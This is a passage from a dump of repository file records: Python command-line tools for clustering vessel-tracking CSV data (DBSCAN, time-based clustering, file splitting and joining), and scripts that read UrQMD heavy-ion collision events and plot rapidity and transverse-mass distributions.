not None and lines >= maxlines: break\n\n with open(filename) as f:\n rows = csv.DictReader(f)\n\n X = numpy.zeros((lines, len(rows.fieldnames)))\n\n latlng = ['longitude', 'latitude']\n fieldnames = latlng + [name for name in rows.fieldnames\n if name not in latlng]\n\n for idx, row in enumerate(rows):\n if idx >= lines: break\n\n for fieldidx, name in enumerate(fieldnames):\n try:\n X[idx][fieldidx] = float(row[name])\n except ValueError:\n X[idx][fieldidx] = float(\"nan\")\n return fieldnames, X\n\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument('infile', metavar='FILE.csv', type=str, help='Input file')\nparser.add_argument('outfile', metavar='FILE.csv', type=str, help='Output file')\nparser.add_argument('--eps', metavar='N', type=float, default=0.013498916666666666,\n help='eps')\nparser.add_argument('--min_samples', metavar='N', type=int, default=3,\n help='min_samples')\n\nargs = parser.parse_args(sys.argv[1:])\n\nfieldnames, X = loaddata(args.infile)\ndb = sklearn.cluster.DBSCAN(eps=args.eps, min_samples=args.min_samples).fit(X[:,0:2])\n\nwith open(args.outfile, \"w\") as f:\n f = csv.writer(f)\n\n f.writerow([\n \"series\",\n \"longitude\",\n \"latitude\",\n \"timestamp\",\n \"start\",\n \"end\",\n \"score\",\n \"cog\",\n \"sog\",\n \"sigma\",\n \"weight\",\n \"count\"\n ])\n\n for k in set(db.labels_):\n points = X[(db.labels_ == k).nonzero()]\n f.writerow([\n points[0,fieldnames.index(\"series\")],\n numpy.mean(points[:,fieldnames.index(\"longitude\")]),\n numpy.mean(points[:,fieldnames.index(\"latitude\")]),\n numpy.mean(points[:,fieldnames.index(\"timestamp\")]),\n numpy.min(points[:,fieldnames.index(\"timestamp\")]),\n numpy.max(points[:,fieldnames.index(\"timestamp\")]),\n numpy.mean(points[:,fieldnames.index(\"score\")]),\n numpy.mean(points[:,fieldnames.index(\"cog\")]),\n numpy.mean(points[:,fieldnames.index(\"sog\")]),\n math.sqrt( numpy.std(points[:,fieldnames.index(\"longitude\")])**2\n + numpy.std(points[:,fieldnames.index(\"latitude\")])**2),\n numpy.sum(points[:,fieldnames.index(\"score\")]),\n points.shape[0]\n ])\n"
},
{
"alpha_fraction": 0.7785235047340393,
"alphanum_fraction": 0.7829977869987488,
"avg_line_length": 27.838708877563477,
"blob_id": "8a5aad5526ccb16224c4446ce95dff44f61be454",
"content_id": "38621d6e443b07a22e56a1e4698edc8a5d7053ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 31,
"path": "/README.md",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "Tools and pipelines:\n\n timestamptosec INFILE OUTFILE\n\nConverts timestamps in Y-M-D H:M:S UTC (string) format to seconds since epoch (integer)\n\n augment INFILE OUTFILE\n\nAdds weight and sigma columns with default values (score and 1.0),\nwhich allows the raw data to be used by the cluster animations for the\ndeepest zoom levels. OUTFILE is suitable as input to cluster\nanimation.\n\n timecluser INFILE OUTFILE\n\nClusters by time difference, within vessel id. OUTFILE is suitable as\ninput to cluster animation.\n\n split --outdir=DIRNAME INFILE\n\nSplits a file by date into multiple files\n\n dbcluster INFILE OUTFILE\n\nClusters indata by distance using the DBSCAN algorithm. OUTFILE is\nsuitable as input to cluster animation.\n\n join INFILE1 INFILE2 ...INFILEN OUTFILE\n\nConcatenates all INFILEX into OUTFILE. If INFILEX is suitable as input\nto cluster animation then OUTFILE will be too.\n"
},
{
"alpha_fraction": 0.5353426337242126,
"alphanum_fraction": 0.5446717143058777,
"avg_line_length": 26.190244674682617,
"blob_id": "7998c5bf8648ee4a72dd963126b5837f3cb94741",
"content_id": "884d9700371344fc087a1867414118b35021d056",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5574,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 205,
"path": "/timecluster",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set fileencoding=utf-8 :\n# SETUPTOOLS_DO_NOT_WRAP\n\n# cluster rows.csv clusters.csv\n#\n# - Copyright (C) 2014 SkyTruth\n# Author: Egil Moeller <[email protected]>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\nimport csv\nimport sys\nimport math\nimport operator\n\nargs = {\n \"maxdist\": 60*60,\n }\nfiles = []\nfor arg in sys.argv[1:]:\n if arg.startswith(\"--\"):\n arg = arg[2:]\n if '=' in arg:\n arg, value = arg.split(\"=\", 1)\n args[arg] = value\n else:\n args[arg] = True\n else:\n files.append(arg)\n\nclass AbstractStdDev(object):\n def get(self):\n return math.sqrt(self.getSqr())\n def __add__(self, other):\n return StdDevSum(self.getSqr() + other.getSqr())\n\nclass StdDevSum(AbstractStdDev):\n def __init__(self, sqr):\n self.sqr = sqr\n def getSqr(self):\n return self.sqr\n \nclass StdDev(AbstractStdDev):\n def __init__(self):\n self.count = 0\n self.sum = 0\n self.sqrsum = 0\n def add(self, value):\n self.count += 1\n self.sum += value\n self.sqrsum += value**2\n def getSqr(self):\n if self.count == 0:\n return 0\n a = self.sqrsum/self.count\n b = (self.sum/self.count)**2\n # Handle rounding errors\n if a < b:\n assert b - a < 1e10-10\n return 0.0\n return a - b\n\nclass Avg(object):\n def __init__(self):\n self.count = 0\n self.sum = 0\n def add(self, value):\n self.count += 1\n self.sum += value\n def get(self):\n return self.sum/self.count\n\nclass Sum(object):\n def __init__(self):\n self.sum = 0\n def add(self, value):\n self.sum += value\n def get(self):\n return self.sum\n\nclass Count(object):\n def __init__(self):\n self.count = 0\n def add(self, value):\n self.count += 1\n def get(self):\n return self.count\n\nclass First(object):\n def __init__(self):\n self.value = None\n def add(self, value):\n if self.value is None:\n self.value = value\n def get(self):\n return self.value\n\nclass Last(object):\n def __init__(self):\n self.value = None\n def add(self, value):\n self.value = value\n def get(self):\n return self.value\n\ndef floatify(row):\n for key in row:\n if key in ('mmsi','series'): continue\n try:\n row[key] = float(row[key])\n except ValueError:\n pass\n\nclass Stat(object):\n def __init__(self, source, cls):\n self.source = source\n self.value = cls()\n def add(self, value):\n self.value.add(value[self.source])\n def get(self):\n return self.value.get()\n\nclass StatSum(object):\n def __init__(self, *stats):\n self.stats = stats\n def add(self, value):\n for stat in self.stats:\n stat.add(value)\n def get(self):\n return reduce(operator.add, [stat.value for stat in self.stats]).get()\n\nclass Stats(object):\n def __init__(self):\n self.fieldmap = {\n \"mmsi\": Stat(\"mmsi\", First),\n \"series\": Stat(\"series\", First),\n \"longitude\": Stat(\"longitude\", Avg),\n \"latitude\": Stat(\"latitude\", Avg),\n \"timestamp\": Stat(\"timestamp\", Avg),\n \"start\": Stat(\"timestamp\", First),\n \"end\": Stat(\"timestamp\", Last),\n \"score\": Stat(\"score\", Avg),\n \"cog\": Stat(\"cog\", Avg),\n \"sog\": Stat(\"sog\", Avg),\n \"sigma\": StatSum(Stat(\"latitude\", StdDev),\n Stat(\"longitude\", StdDev)),\n \"weight\": Stat(\"score\", Sum),\n \"count\": Stat(\"score\", Count)\n }\n def add(self, value):\n for field in self.fieldmap.itervalues():\n field.add(value)\n def get(self):\n return {\n key: value.get()\n for (key, value)\n in self.fieldmap.iteritems()}\n\ntry:\n with open(files[0]) as infile:\n infile = csv.DictReader(infile)\n with open(files[1], \"w\") as outfile:\n\n stats = Stats()\n\n outfile = csv.DictWriter(outfile, stats.fieldmap.keys(), 'ignore')\n outfile.writeheader()\n\n def writeCluster():\n global stats\n outfile.writerow(stats.get())\n stats = Stats()\n\n last_row = None\n for row in infile:\n floatify(row)\n new_cluster = not last_row or (row['mmsi'] != last_row['mmsi'] or abs(row['timestamp'] - last_row['timestamp']) >= args['maxdist'])\n\n if new_cluster and last_row:\n writeCluster()\n stats.add(row)\n\n last_row = row\n\n if last_row:\n writeCluster()\nexcept:\n import pdb\n import sys\n sys.last_traceback = sys.exc_info()[2]\n pdb.pm()\n"
},
{
"alpha_fraction": 0.6396551728248596,
"alphanum_fraction": 0.6448276042938232,
"avg_line_length": 24.173913955688477,
"blob_id": "b4bcd8af09b0034844f612e3cecf0d3705ad1530",
"content_id": "0f3328fa7e6eb2072b507d5998553fbbdcfc9379",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 23,
"path": "/join",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\nimport sys\nimport csv\nimport os.path\n\ninfilenames = sys.argv[1:-1]\noutfilename = sys.argv[-1]\n\nfieldnames = set()\nfor infilename in infilenames:\n with open(infilename) as f:\n f = csv.DictReader(f)\n fieldnames = fieldnames.union(f.fieldnames)\n\nwith open(outfilename, \"w\") as outfile:\n outfile = csv.DictWriter(outfile, fieldnames, 'ignore')\n outfile.writeheader()\n for infilename in infilenames:\n with open(infilename) as f:\n f = csv.DictReader(f)\n for row in f:\n outfile.writerow(row)\n\n"
},
{
"alpha_fraction": 0.5933333039283752,
"alphanum_fraction": 0.602222204208374,
"avg_line_length": 27.125,
"blob_id": "eb301120bfbf862d51833f8ff9e93e32d827d19f",
"content_id": "d056c42d112218023db36f7c508111a988ead2a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 450,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 16,
"path": "/augment",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\nimport sys\nimport csv\nimport os.path\nimport datetime\n\n\nwith open(sys.argv[1]) as infile:\n infile = csv.DictReader(infile)\n with open(sys.argv[2], \"w\") as outfile:\n outfile = csv.DictWriter(outfile, infile.fieldnames + ['weight', 'sigma'], 'ignore')\n outfile.writeheader()\n for row in infile:\n row['weight'] = row['score']\n row['sigma'] = '0.0'\n outfile.writerow(row)\n"
},
{
"alpha_fraction": 0.5143885016441345,
"alphanum_fraction": 0.5233812928199768,
"avg_line_length": 29.027027130126953,
"blob_id": "f34a661b87bb13b15315e6bbc0f82c9cf6a46b20",
"content_id": "e2d8c6c02ee1064ff41683cd2772ce2e0b322079",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1112,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 37,
"path": "/split",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\nimport sys\nimport csv\nimport os.path\n\ndef parseArgs(argv, *files, **args): \n args = dict(args)\n files = list(files)\n for arg in argv:\n if arg.startswith(\"--\"):\n arg = arg[2:]\n if '=' in arg:\n arg, value = arg.split(\"=\", 1)\n args[arg] = value\n else:\n args[arg] = True\n else:\n files.append(arg)\n return args, files\n\nargs, files = parseArgs(sys.argv[1:],\n timeunit=24*60*60,\n outdir=\".\")\n\nargs[\"timeunit\"] = int(args[\"timeunit\"])\n\nwith open(files[0]) as infile:\n infile = csv.DictReader(infile)\n for row in infile:\n timebucket = int(row['timestamp']) - (int(row['timestamp']) % int(args['timeunit']))\n filename = \"%s/%s.csv\" % (args['outdir'], timebucket)\n is_new = not os.path.exists(filename) \n with open(filename, \"a\") as outfile:\n outfile = csv.DictWriter(outfile, infile.fieldnames, 'ignore')\n if is_new: outfile.writeheader()\n outfile.writerow(row)\n\n"
},
{
"alpha_fraction": 0.6729758381843567,
"alphanum_fraction": 0.687697172164917,
"avg_line_length": 28.71875,
"blob_id": "a72f6eaabf006de88c58122c37c9ade2d3480d8b",
"content_id": "a80cdc30f46df7c780ceeaf4079cd1f4ef2c2a8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 951,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 32,
"path": "/setup.py",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python\n\nfrom setuptools.command import easy_install\nfrom setuptools import setup, find_packages\nimport shutil\nimport os.path\nimport sys\nimport hashlib\n\nPKG_DIR = os.path.abspath(os.path.dirname(__file__))\nPKG_NAME = os.path.basename(PKG_DIR)\n\n# Make it possible to overide script wrapping\nold_is_python_script = easy_install.is_python_script\ndef is_python_script(script_text, filename):\n if 'SETUPTOOLS_DO_NOT_WRAP' in script_text:\n return False\n return old_is_python_script(script_text, filename)\neasy_install.is_python_script = is_python_script\n\nsetup(\n name = \"clustering\",\n description = \"Command line tools for scikit-learn\",\n keywords = \"csv cluster\",\n install_requires = [\"scikit-learn>=0.14.1\", \"numpy>=1.8.0\", \"scipy>=0.13.3\"],\n version = \"0.0.1\",\n author = \"Egil Moeller\",\n author_email = \"[email protected]\",\n license = \"GPL\",\n url = \"https://github.com/SkyTruth/clustering\",\n scripts = [\"cluster\"]\n)\n"
},
{
"alpha_fraction": 0.6305732727050781,
"alphanum_fraction": 0.634819507598877,
"avg_line_length": 30.33333396911621,
"blob_id": "dc156cfa563b00aa317451c93a6757e257f5b795",
"content_id": "5c0ad077789ea5a8fd34635afd276876e07862c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 471,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 15,
"path": "/timestamptosec",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\nimport sys\nimport csv\nimport os.path\nimport datetime\n\nwith open(sys.argv[1]) as infile:\n infile = csv.DictReader(infile)\n with open(sys.argv[2], \"w\") as outfile:\n outfile = csv.DictWriter(outfile, infile.fieldnames, 'ignore')\n outfile.writeheader()\n for row in infile:\n row['timestamp'] = datetime.datetime.strptime(row['timestamp'], \"%Y-%m-%d %H:%M:%S UTC\").strftime(\"%s\")\n outfile.writerow(row)\n\n"
},
{
"alpha_fraction": 0.6594203114509583,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 31.352941513061523,
"blob_id": "8cea4f373a0ff12e7238d6c6a7d5857e572fe687",
"content_id": "64e6f5de0c20757a4337406b6ea43bd6dec1d5e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 552,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 17,
"path": "/gridify",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\nimport sys\nimport csv\nimport os.path\nimport datetime\nfrom vectortile import TileBounds\n\nMAX_ZOOM=15\n\nwith open(sys.argv[1]) as infile:\n infile = csv.DictReader(infile)\n with open(sys.argv[2], \"w\") as outfile:\n outfile = csv.DictWriter(outfile, infile.fieldnames + ['gridcode'], 'ignore')\n outfile.writeheader()\n for row in infile:\n row['gridcode'] = str(TileBounds.from_point(lon=float(row['longitude']), lat=float(row['latitude']), zoom_level=MAX_ZOOM))\n outfile.writerow(row)\n\n\n"
}
] | 9 |
pklaus/urqmd-analysis | https://github.com/pklaus/urqmd-analysis | 8fa6a7978553bd93701ac8421f79713e65e8f67f | b1932383fef171af1d195f475a58dabf5ddb7642 | 766e47084e8539447f28e1769cfad11ece47a356 | refs/heads/master | 2021-01-19T13:00:51.465108 | 2014-11-17T00:31:16 | 2014-11-17T00:32:13 | 26,578,855 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5713386535644531,
"alphanum_fraction": 0.5973562598228455,
"avg_line_length": 37.42741775512695,
"blob_id": "31e02404e9a17268be25bb5edfdbe1cb29198626",
"content_id": "2437b24b8b368be79b6d0f4a918341216a184b39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4766,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 124,
"path": "/plot_urqmd_pandas.py",
"repo_name": "pklaus/urqmd-analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\" UrQMD File Reader \"\"\"\n\nimport argparse\nimport logging\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Read a config file.')\n parser.add_argument('hdf5_file', metavar='HDF5_FILE', help=\"The HDF5 file containing the UrQMD events\")\n parser.add_argument('--verbosity', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR'])\n parser.add_argument('--event-no', type=int, help='Total number of events (to scale histograms)')\n args = parser.parse_args()\n\n logging.basicConfig(level=args.verbosity)\n\n hdf = pd.HDFStore(args.hdf5_file)\n df = hdf['particles']\n\n try:\n event_no = len(df['event_id'].unique())\n except:\n if args.event_no: event_no = args.event_no\n else: parser.error('The event_id is not included in the data. You must thus specify --event-no as param.')\n \n df['y'] = .5 * np.log((df.p0 + df.pz)/(df.p0 - df.pz))\n df['mT'] = np.sqrt(df.m**2 + df.px**2 + df.py**2)\n df['mT_weights'] = 1./df.mT**2\n nucleons = df[df.ityp == 1]\n pions = df[df.ityp == 101]\n kaons = df[abs(df.ityp) == 106]\n logging.info(\"{} particles of which {} pions or kaons\".format(len(df), len(pions), len(pions)+len(kaons)))\n \n fig, ax = plt.subplots(1,2, figsize=(10,4))\n\n ### rapidity distribution\n ax[0].set_title('Rapidity Distribution')\n #fig.text(0.35, 0.04, 'rapidity', ha='center', va='center')\n ax[0].set_xlabel('rapidity y / GeV')\n #fig.text(0.10, 0.5, 'dN/dy', ha='center', va='center', rotation='vertical')\n ax[0].set_ylabel('dN/dy')\n bins_rapidity = np.linspace(-4.0, 4.0, num=81)\n # All Particles\n hist, bins = np.histogram(df.y, bins=bins_rapidity)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='grey', label='all particles')\n # Pions\n hist, bins = np.histogram(pions.y, bins=bins_rapidity)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='blue', label='pions')\n prev_hist = hist\n # Nucleons\n hist, bins = np.histogram(nucleons.y, bins=bins_rapidity)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='yellow', label='nucleons', bottom=prev_hist)\n prev_hist += hist\n # Kaons\n hist, bins = np.histogram(kaons.y, bins=bins_rapidity)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='red', label='kaons', bottom=prev_hist)\n ax[0].legend()\n\n ### transverse mass distribution\n ax[1].set_title('Transverse Mass Distribution')\n #fig.text(0.70, 0.04, 'mT / GeV', ha='center', va='center')\n ax[1].set_xlabel('dN/dy')\n #fig.text(0.50, 0.5, '1/mT^2 dN/dmT', ha='center', va='center', rotation='vertical')\n ax[1].set_ylabel('1/mT^2 dN/dmT')\n # We use the rapidity cut: |y| < 1.0\n nucleons = nucleons[np.abs(nucleons.y) < 1.0]\n pions = pions[np.abs(pions.y) < 1.0]\n kaons = kaons[np.abs(kaons.y) < 1.0]\n bins_mT = np.linspace(0.0, 4.0, num=81)\n # Nucleons\n hist, bins = np.histogram(nucleons.mT, weights=nucleons.mT_weights, bins=bins_mT)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[1].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='yellow', log=True, fill=True, label='nucleons')\n # Pions\n hist, bins = np.histogram(pions.mT, weights=pions.mT_weights, bins=bins_mT)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[1].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='blue', log=True, fill=True, label='pions')\n # Kaons\n hist, bins = np.histogram(kaons.mT, weights=kaons.mT_weights, bins=bins_mT)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[1].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='red', log=True, fill=True, label='kaons')\n ax[1].legend()\n fig.show()\n\n # Fitting the temperature\n def decay(x, x_p, y_p, y0, x0):\n return y0 + y_p * np.exp(-(x-x0)*x_p)\n\n import pdb; pdb.set_trace()\n hdf.close()\n\n\nif __name__ == \"__main__\":\n main()\n\n"
},
{
"alpha_fraction": 0.579365074634552,
"alphanum_fraction": 0.5943722724914551,
"avg_line_length": 33.819095611572266,
"blob_id": "5c1cc260dbb2ba9485b7f8d3c12b0c39d8e896a0",
"content_id": "93f4c9f476640965439932afdaa8af98b87e1999",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6930,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 199,
"path": "/plot_urqmd.py",
"repo_name": "pklaus/urqmd-analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\" UrQMD File Reader \"\"\"\n\nfrom read_urqmd import F14_Reader\nimport argparse\nimport pickle\nimport logging\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass Particle(object):\n\n def __init__(self, properties):\n self._properties = properties\n # precalculate expensive values:\n self._mT = math.sqrt(self.m0**2 + self.px**2 + self.py**2)\n\n @property\n def id(self):\n return int(self._properties[9])\n\n @property\n def time(self):\n return float(self._properties[0])\n\n @property\n def E(self):\n return float(self._properties[4])\n\n @property\n def px(self):\n return float(self._properties[5])\n\n @property\n def py(self):\n return float(self._properties[6])\n\n @property\n def pz(self):\n return float(self._properties[7])\n\n @property\n def m0(self):\n return float(self._properties[8])\n\n @property\n def mT(self):\n return self._mT\n\n @property\n def y(self):\n \"\"\" rapidity \"\"\"\n return .5 * math.log((self.E + self.pz)/(self.E - self.pz))\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Read a config file.')\n parser.add_argument('urqmd_file', metavar='URQMD_FILE', type=argparse.FileType('r'), help=\"Must be of type .f14\")\n parser.add_argument('--verbosity', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR'])\n args = parser.parse_args()\n\n logging.basicConfig(level=args.verbosity)\n\n events = []\n event_number = []\n particle_number = []\n particle_y = []\n nucleon_y = []\n nucleon_number = []\n pion_number = []\n kaon_number = []\n pion_y = []\n pion_mT = []\n pion_mT_weights = []\n kaon_y = []\n kaon_mT = []\n kaon_mT_weights = []\n particle_mT = []\n particle_mT_weights = []\n nucleon_mT = []\n nucleon_mT_weights = []\n for event in F14_Reader(args.urqmd_file).get_events():\n events.append(event)\n event_number.append(event['id'])\n particles = [Particle(particle_properties) for particle_properties in event['particle_properties']]\n particle_y += [particle.y for particle in particles]\n particle_mT += [particle.mT for particle in particles if abs(particle.y) < 1.0]\n particle_mT_weights += [1/particle.mT**2 for particle in particles if abs(particle.y) < 1.0]\n nucleons = [particle for particle in particles if particle.id == 1]\n pions = [particle for particle in particles if particle.id == 101]\n kaons = [particle for particle in particles if abs(particle.id) == 106]\n nucleon_number.append(len(nucleons))\n pion_number.append(len(pions))\n kaon_number.append(len(kaons))\n for nucleon in nucleons:\n nucleon_y.append(nucleon.y)\n if abs(nucleon.y) < 1.0:\n nucleon_mT.append(nucleon.mT)\n # weights for the histogram\n # http://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html\n nucleon_mT_weights.append(1/nucleon.mT**2)\n for pion in pions:\n pion_y.append(pion.y)\n if abs(pion.y) < 1.0:\n pion_mT.append(pion.mT)\n # weights for the histogram\n # http://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html\n pion_mT_weights.append(1/pion.mT**2)\n for kaon in kaons:\n kaon_y.append(kaon.y)\n if abs(kaon.y) < 1.0:\n kaon_mT.append(kaon.mT)\n # weights for the histogram\n # http://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html\n kaon_mT_weights.append(1/kaon.mT**2)\n particle_number.append(len(particles))\n logging.info(\"Event #{}: {} particles of which {} pions or kaons\".format(event['id'], len(particles), len(pions)+len(kaons)))\n \n df_physics = pd.DataFrame({'particles': particle_number, 'pions': pion_number, 'kaons': kaon_number}, index=event_number)\n\n df_events = pd.DataFrame({'particles': particle_number, 'pions': pion_number, 'kaons': kaon_number}, index=event_number)\n print(df_events.describe())\n\n event_no = len(events)\n\n fig, ax = plt.subplots(1,2, figsize=(10,4))\n\n ### rapidity distribution\n ax[0].set_title('Rapidity Distribution')\n #fig.ylabel('dN/dy')\n #ax[0].xlabel('y / GeV')\n bins_rapidity = 50\n # All Particles\n hist, bins = np.histogram(particle_y, bins=bins_rapidity)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='grey', label='all particles')\n # Pions\n hist, bins = np.histogram(pion_y, bins=bins_rapidity)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='blue', label='pions')\n # Nucleons\n hist, bins = np.histogram(nucleon_y, bins=bins_rapidity)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='yellow', label='nucleons')\n # Kaons\n hist, bins = np.histogram(kaon_y, bins=bins_rapidity)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='red', label='kaons')\n ax[0].legend()\n\n ### transverse mass distribution\n ax[1].set_title('Transverse Mass Distribution')\n #ax[1].ylabel('1/mT^2 dN/dmT')\n #ax[1].xlabel('mT / GeV')\n bins_mT = 80\n # Nucleons\n hist, bins = np.histogram(nucleon_mT, weights=nucleon_mT_weights, bins=bins_mT)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[1].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='yellow', log=True, fill=True, label='nucleons')\n # Pions\n hist, bins = np.histogram(pion_mT, weights=pion_mT_weights, bins=bins_mT)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[1].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='blue', log=True, fill=True, label='pions')\n # Kaons\n hist, bins = np.histogram(kaon_mT, weights=kaon_mT_weights, bins=bins_mT)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[1].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='red', log=True, fill=True, label='kaons')\n ax[1].legend()\n fig.show()\n import pdb; pdb.set_trace()\n\n\nif __name__ == \"__main__\":\n main()\n\n"
},
{
"alpha_fraction": 0.5529506802558899,
"alphanum_fraction": 0.5618431568145752,
"avg_line_length": 27.744186401367188,
"blob_id": "f90b1a6a907087cd22951ff6f57e527431985220",
"content_id": "1f07271f0c0add689ce185dac0d9fbb0dfa33111",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1237,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 43,
"path": "/read_urqmd.py",
"repo_name": "pklaus/urqmd-analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\" UrQMD File Reader \"\"\"\n\nimport argparse\nimport pickle\nimport logging\n\n\nclass F14_Reader(object):\n\n def __init__(self, data_file):\n self.data_file = data_file\n\n def get_events(self):\n new_event = False\n event = None\n for line in self.data_file:\n parts = line.split()\n if not len(parts): continue\n if parts[0] == 'UQMD': new_event = True\n if new_event:\n if event: yield event\n event = dict()\n event['particle_properties'] = []\n new_event = False\n if parts[0] == 'event#': event['id'] = int(parts[1])\n if len(parts) == 15:\n event['particle_properties'].append(parts)\n if event: yield event\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Read a config file.')\n parser.add_argument('urqmd_file', metavar='URQMD_FILE', type=argparse.FileType('r'), help=\"Must be of type .f14\")\n args = parser.parse_args()\n\n for event in F14_Reader(args.urqmd_file).get_events():\n print(\"Event #{} containing {} particles\".format(event['id'], len(event['particle_properties'])))\n\n\nif __name__ == \"__main__\":\n main()\n\n"
},
{
"alpha_fraction": 0.745726466178894,
"alphanum_fraction": 0.75,
"avg_line_length": 37.83333206176758,
"blob_id": "77c8f7dbcc9ba56dfe834c508edbe88e35612735",
"content_id": "3fe6cf54e991e7f6711fc774a018467ba7853f24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 468,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 12,
"path": "/README.md",
"repo_name": "pklaus/urqmd-analysis",
"src_encoding": "UTF-8",
